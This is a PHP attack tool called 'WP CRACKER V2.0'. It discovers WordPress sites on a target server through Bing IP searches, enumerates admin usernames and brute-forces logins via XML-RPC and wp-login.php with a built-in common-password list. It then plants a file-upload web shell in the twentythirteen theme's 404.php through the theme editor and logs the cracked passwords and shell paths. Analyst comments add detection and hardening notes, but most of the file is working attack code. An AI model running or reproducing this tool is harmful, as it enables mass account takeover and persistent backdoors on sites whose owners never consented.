1 | <html> | |
2 | <title>WP CRACKER V2.0</title> | |
3 | <style> | |
4 | body{background-color:#f1f1f1;} | |
5 | input,select,textarea{ | |
6 | border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; | |
7 | } | |
8 | </style> | |
9 | <center> | |
10 | <table cellpadding='5'> | |
11 | <tr><td align=center><h2>WP CRACKER V2.0</h2></td></tr> | |
12 | <?php | |
13 | #WP CRACKER V2.0 | |
14 | #INJ3CTOR_M4 | |
15 | @set_time_limit(0); | |
16 | error_reporting(0); | |
17 | ||
18 | if(!isset($_POST['brute'])){ | |
19 | echo'<tr><td align="center">'; | |
20 | echo'<b>Server iP:</b>'; | |
21 | echo'<form method="POST">'; | |
22 | echo'<input size="60" type="text" name="ip" placeholder="Put Target Server iP">'; | |
23 | echo'<input type="submit" value="Grab_WP!"></td></tr></table>'; | |
24 | echo'<table cellpadding="5">'; | |
25 | echo'<tr><td align="center"><b>Web-Sites List</b></td><td align="center"><b>Passwords</b></td></tr>'; | |
26 | if(!isset($_POST['ip'])){ | |
27 | echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23" placeholder="http://localhost/"></textarea></td>'; | |
28 | }else{ | |
29 | $ip = trim($_POST['ip']); | |
30 | $dorks = array('/?page_id=', '/?p='); | |
31 | foreach($dorks as $dork){ | |
32 | $query = "ip:$ip $dork"; | |
33 | $allLinks = bingServerCrawler($query); | |
34 | foreach($allLinks as $link){ | |
35 | if(eregi("page_id=|p=", $link)){ $link = pathinfo($link)['dirname']; | |
36 | $data = get_source($link . "/wp-includes/wlwmanifest.xml"); | |
37 | if(preg_match('#<clientType>WordPress</clientType>#i', $data)){ | |
38 | $wpLinks[] = $link; | |
39 | } | |
40 | } | |
41 | } | |
42 | } | |
43 | if(!empty($wpLinks)){ $wpLinks = array_unique($wpLinks); | |
44 | echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23">'; | |
45 | foreach($wpLinks as $wordpress){ | |
46 | echo $wordpress ."\r\n"; | |
47 | } | |
48 | echo'</textarea></td>'; | |
49 | } | |
50 | } | |
51 | echo'<td><textarea name="passwords" cols="32" rows="23">'; | |
52 | echo' | |
53 | 00000 | |
54 | 000000 | |
55 | 0000000 | |
56 | 00000000 | |
57 | 0123456789 | |
58 | 102030 | |
59 | 111111 | |
60 | 112233 | |
61 | 123 | |
62 | 123123 | |
63 | 12345 | |
64 | 123456 | |
65 | 1234567 | |
66 | 12345678 | |
67 | 123456789 | |
68 | 321321 | |
69 | 654321 | |
70 | admin | |
71 | adminadmin | |
72 | admin123 | |
73 | admin123123 | |
74 | admin1234 | |
75 | admin123456 | |
76 | administrator | |
77 | abc123 | |
78 | demo | |
79 | qwerty | |
80 | qwerty123 | |
81 | passwd | |
82 | password | |
83 | p@ssw0rd | |
84 | passw0rd | |
85 | passwords | |
86 | pass123 | |
87 | pass121 | |
88 | pass | |
89 | pass1234 | |
90 | test | |
91 | test123 | |
92 | root | |
93 | toor | |
94 | user | |
95 | welcome1 | |
96 | welcome | |
97 | '; | |
98 | echo'</textarea></td></tr></table>'; | |
99 | echo'<table cellpadding="5">'; | |
100 | echo'<tr><td align="center"><input type="submit" name="brute" value="Start BruteForce!"/></form></td></tr></table>'; | |
101 | }else{ | |
102 | $sites = array_unique(array_map("trim", explode("\r\n", $_POST['sites']))); | |
103 | $passwords = array_unique(array_map("trim", explode("\r\n", $_POST['passwords']))); | |
104 | $f = fopen('rezult.html', 'a+'); | |
105 | echo'<table border="1" cellpadding="5">'; | |
106 | foreach($sites as $site){ | |
107 | $site = rtrim($site, '/'); | |
108 | vbflush(); # buffer clean | |
109 | echo"<tr><td><b>Target --> $site</b></td></tr>"; | |
110 | fwrite($f, "<br />target --> <b>$site</b><br />"); | |
111 | $user = admin_wp($site); | |
112 | echo"<tr><td>Username is: <b>$user</b></td>"; | |
113 | fwrite($f, "Username: <b>$user</b><br />"); | |
114 | foreach($passwords as $pass){ | |
115 | if(WP_CRACKER($site, $user,$pass) == true){ | |
116 | vbflush(); # buffer clean | |
117 | echo"<tr><td><b><font color='green'>Password is: $pass</font></b></td></tr>"; | |
118 | fwrite($f, "Password: <b>$pass</b><br />"); | |
119 | if(uploadshell($site) == true){ | |
120 | echo"<tr><td><b><font color='green'>Shell Uploaded: $site/wp-content/themes/twentythirteen/404.php</font></b></td></tr>"; | |
121 | fwrite($f, "Shell: <b>$site/wp-content/themes/twentythirteen/404.php</b><br />"); | |
122 | }else{ | |
123 | echo'<tr><td><font color="red">Can\'t Upload Shell!</font></td></tr>'; | |
124 | } | |
125 | break; | |
126 | }else{ | |
127 | vbflush(); # buffer clean | |
128 | echo"<tr><td><font color='red'>$pass NO!</font></td></tr>"; | |
129 | } | |
130 | } | |
131 | } | |
132 | fclose($f); | |
133 | } | |
134 | echo'</table>'; | |
135 | ||
136 | // Functions // | |
137 | ||
// Reconnaissance step: pages through Bing web search for $dork (the caller builds
// an "ip:<target> /?page_id=" style query) and returns the de-duplicated result
// URLs, or null when nothing was extracted (there is no empty-array return, and
// the caller iterates the result without checking it).
//
// Analyst notes:
//  - Search traffic goes out over plain http with a fixed Symbian-era mobile
//    User-Agent ("SamsungI8910/SymbianOS/9.1 ...").
//  - The cookie jar 'cookie.txt' in the working directory is shared with the
//    login and theme-editor requests further down; together with 'rezult.html'
//    it is an on-disk artefact of this tool having been run from a host.
//  - Result extraction depends on Bing's old "sb_h3 cttl" / "sb_pagN" markup;
//    if that markup is absent the loop ends after one page with no links.
function bingServerCrawler($dork){
$ch = curl_init();
$i = 1;
// $i is the Bing "first result" offset; it only ever grows, so the loop is
// terminated solely by the break below (no more "next page" marker).
while($i){
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q=" . urlencode($dork) . "&first={$i}");
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_USERAGENT, "SamsungI8910/SymbianOS/9.1 Series60/3.0");
curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate, compress");
$data = curl_exec($ch);
// Pull every result link (href of the result heading anchor) from this page.
preg_match_all('#<h2 class="sb_h3 cttl"><a href="(.*?)"#i', $data, $matches);
foreach($matches[1] as $link){
$allLinks[] = $link;
}
// Stop when the page has no pagination ("next") control.
if(!preg_match('#class="sb_pagN"#i', $data)) break;
$i+=10;
}
curl_close($ch);
// Falls through (returns null) when no link was ever collected.
if(!empty($allLinks) && is_array($allLinks)){
return array_unique($allLinks);
}
}
161 | ||
// Generic page fetcher used by the fingerprinting, username-enumeration and
// login-check steps. Returns the response body (curl), the file_get_contents()
// result when the curl extension is missing, or false on transport failure.
//
// NOTE(review): $agent is a required parameter declared after the optional
// $safemode, and every caller in this file passes a single argument. On PHP 5
// that produced a warning and an unset $agent (hence the default below); on
// PHP 7.1+ a missing required argument is an ArgumentCountError, so as written
// this helper should fail on current PHP. Left as-is deliberately.
//
// Analyst notes:
//  - The default User-Agent impersonates Googlebot. Genuine Googlebot traffic
//    can be verified by reverse/forward DNS; a "Googlebot" UA fetching
//    /wp-includes/wlwmanifest.xml, /?feed=atom, /?author=1 or /xmlrpc.php from
//    an unrelated address is a usable detection signal for this tool.
//  - TLS certificate verification is disabled (CURLOPT_SSL_VERIFYPEER = 0) and
//    redirects are followed, so the tool will happily talk to any endpoint.
function get_source($link, $safemode = false, $agent){
// Optional one-second pacing between requests; no caller enables it.
if($safemode === true) sleep(1);
if(!$agent){ $agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'; }
if(!function_exists('curl_init')){
// Fallback without curl: no UA spoofing, no timeout control.
return file_get_contents($link);
}else{
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_URL, $link);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_ENCODING, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$data = curl_exec($ch);
curl_close($ch);

return $data;
}
}
182 | ||
// Username enumeration for a WordPress site $wp. Two information leaks are used:
//  1. the site's Atom feed: the first <name> element (presumably the author of
//     the newest entry, i.e. a display name rather than necessarily the login);
//  2. the /?author=1 archive page: the "author-<slug>" body class.
// If neither yields a value, "admin" is assumed.
//
// Control-flow caveat visible in the code: when the feed regex matches but the
// captured name is empty or longer than 15 characters, the function returns
// null without ever trying the /?author=1 fallback or the "admin" default.
//
// Defender notes: both leaks are well known; restricting author archives and
// feed author output, and alerting on /?author=N probing from a Googlebot UA,
// blunt this step.
function admin_wp($wp){
$data = get_source($wp . "/?feed=atom");
if(preg_match('#<name>(.*?)</name>#', $data, $user)){
// Length bound is an arbitrary sanity filter on the captured name.
if(strlen($user[1]) > 0 && strlen($user[1]) <= 15){
return $user[1];
}
}else{
$data = get_source($wp . "/?author=1");
// First capture is the author slug from the body class list.
if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i', $data, $user)){
return $user[1];
}else{
return "admin";
}
}
}
198 | ||
// One credential attempt against $site. Returns true when the guess appears to
// have authenticated, false otherwise. Two routes are used:
//  - XML-RPC: if a GET of /xmlrpc.php returns the "server accepts POST" banner,
//    a wp.getUsersBlogs call carrying the credentials is POSTed; success is
//    judged by "<name>isAdmin</name>" appearing in the response.
//  - Form login: otherwise the wp-login.php form is POSTed (with the
//    wordpress_test_cookie pre-set so WordPress does not reject the request);
//    success is judged by the word "logout" appearing anywhere in the followed
//    response, which is a loose heuristic.
//
// Detection / hardening notes:
//  - Every guess is preceded by a fresh GET of /xmlrpc.php, so a burst of
//    GET+POST pairs to /xmlrpc.php (or POSTs to wp-login.php) from a
//    "Googlebot/2.1" UA is the signature to look for; XML-RPC method name
//    wp.getUsersBlogs in request bodies is the high-fidelity indicator.
//  - Disabling or rate-limiting XML-RPC, login throttling and MFA all defeat
//    this loop; the shared 'cookie.txt' jar means a successful login session is
//    persisted on the attacker host for the theme-editor step that follows.
//  - The curl handle $ch is never closed on either branch.
function WP_CRACKER($site, $user, $pass){
$xmlprc = get_source($site .'/xmlrpc.php');
$ch = curl_init();
if(preg_match('#server accepts POST#i', $xmlprc)){
curl_setopt($ch, CURLOPT_URL, $site ."/xmlrpc.php");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_POST, 1);
// Credentials are interpolated straight into the XML-RPC body.
curl_setopt($ch, CURLOPT_POSTFIELDS, "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
return (preg_match('#<name>isAdmin</name>#i', $data)) ? true:false;
}else{
curl_setopt($ch, CURLOPT_URL, $site .'/wp-login.php');
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check");
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($ch, CURLOPT_POST, 1);
// Form fields mirror the standard wp-login.php login form.
curl_setopt($ch, CURLOPT_POSTFIELDS, "log={$user}&pwd={$pass}&wp-submit=Log+In&redirect_to={$site}/wp-admin/&testcookie=1");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
// Any page containing "logout" counts as success, including false positives.
return (preg_match('/logout/', $data)) ? true:false;
}
}
230 | ||
231 | function uploadshell($site){ | |
232 | $ch = curl_init(); | |
233 | curl_setopt($ch, CURLOPT_URL, $site .'/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen'); | |
234 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
235 | curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)"); | |
236 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
237 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
238 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
239 | $data = curl_exec($ch); | |
240 | curl_close($ch); | |
241 | if(preg_match('#name="_wpnonce" value="(.*?)"#', $data, $token)){ | |
242 | $post = "_wpnonce={$token[1]}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentythirteen%26scrollto%3D0%26updated%3Dtrue&newcontent=%3C%3Fphp%0Aecho%20%27Uploader%20By%20INJ3CTOR_M4%27%3B%0Aecho%27%0A%3Cform%20method%3D%22post%22%20enctype%3D%22multipart%2fform-data%22%3E%0A%3Cinput%20name%3D%22file%22%20type%3D%22file%22%20%2f%3E%0A%3Cinput%20name%3D%22path%22%20type%3D%22text%22%20value%3D%22%27.getcwd%28%29.%27%22%20%2f%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22Up%22%20%2f%3E%0A%3C%2fform%3E%0A%27%3B%0Aif%28isset%28%24_FILES%5B%27file%27%5D%29%20%26%26%20isset%28%24_POST%5B%27path%27%5D%29%29%7B%0A%20%20%20%20if%28move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%24_POST%5B%27path%27%5D.%27%2f%27.%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22green%22%3EFile%20Upload%20Done.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7Delse%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22red%22%3EFile%20Upload%20Error.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7D%0A%7D%0A%3F%3E&action=update&file=404.php&theme=twentythirteen&scrollto=0&docs-list=&submit=Update+File"; | |
243 | $ch = curl_init(); | |
244 | curl_setopt($ch, CURLOPT_URL, $site .'/wp-admin/theme-editor.php'); | |
245 | curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
246 | curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)"); | |
247 | curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt'); | |
248 | curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt'); | |
249 | curl_setopt($ch, CURLOPT_POST, 1); | |
250 | curl_setopt($ch, CURLOPT_POSTFIELDS, $post); | |
251 | curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
252 | $data = curl_exec($ch); | |
253 | curl_close($ch); | |
254 | $data = get_source($site .'/wp-content/themes/twentythirteen/404.php'); | |
255 | return (preg_match('/Uploader By INJ3CTOR_M4/', $data)) ? true:false; | |
256 | }else{ return FALSE; } | |
257 | } | |
258 | ||
/**
 * Flush pending output to the client so progress lines are delivered as they
 * are produced rather than at script end.
 *
 * The presence of ob_gzhandler is probed once and remembered in a static;
 * when gzip output buffering is active nothing is flushed, because forcing a
 * flush through a compressing handler produces corrupt output. Otherwise the
 * user-level buffer (if any) is flushed with errors suppressed, followed by
 * the SAPI-level flush().
 */
function vbflush(){
    static $gzipActive = null;
    if($gzipActive === null){
        $handlers = ob_list_handlers();
        $gzipActive = is_array($handlers) && in_array('ob_gzhandler', $handlers, true);
    }
    if($gzipActive){
        return; // never force a flush through ob_gzhandler
    }
    if(ob_get_length() !== false){
        @ob_flush();
    }
    flush();
}